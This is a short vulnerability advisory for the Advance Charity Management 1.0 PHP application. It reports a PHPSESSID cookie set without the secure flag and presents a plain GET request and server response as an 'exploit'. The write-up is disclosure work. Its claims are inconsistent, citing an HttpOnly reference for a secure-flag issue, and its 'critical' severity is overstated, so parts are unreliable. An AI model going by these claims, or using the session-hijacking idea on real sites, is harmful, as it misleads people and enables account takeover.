## Title: Advance Charity Management-1.0 - TLS cookie without secure flag set-PHPSESSID NEVER EXPIRATION-current session-Hijacking ## Author: nu11secur1ty ## Date: 06.04.2023 ## Vendor: https://www.sourcecodester.com/users/aown-shah ## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html ## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set ## Description: The following cookie was issued by the application and does not have the secure flag set: PHPSESSID: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function. The attacker can use the same browser on the same machine to connect with the already logged user before this moment, end he can do very nasty stuff with this already authenticated account. This is a 100% CRITICAL SITUATION if this will happen inside of the network level 2 of some companies. STATUS: HIGH Vulnerability [+]Exploit: ```GET GET /pwnedhost7/members/ HTTP/1.1 Host: pwnedhost7.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Referer: https://pwnedhost7.com/pwnedhost7/ Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+]Response: ```HTTP HTTP/1.1 200 OK Date: Sun, 04 Jun 2023 10:13:00 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 25629
Notice: Undefined index: rainbow_uid in C:\xampp7.4\htdocs\pwnedhost7\members\header.php on line 7

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, bool given in C:\xampp7.4\htdocs\pwnedhost7\members\header.php on line 12 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html) ## Time spend: 00:37:00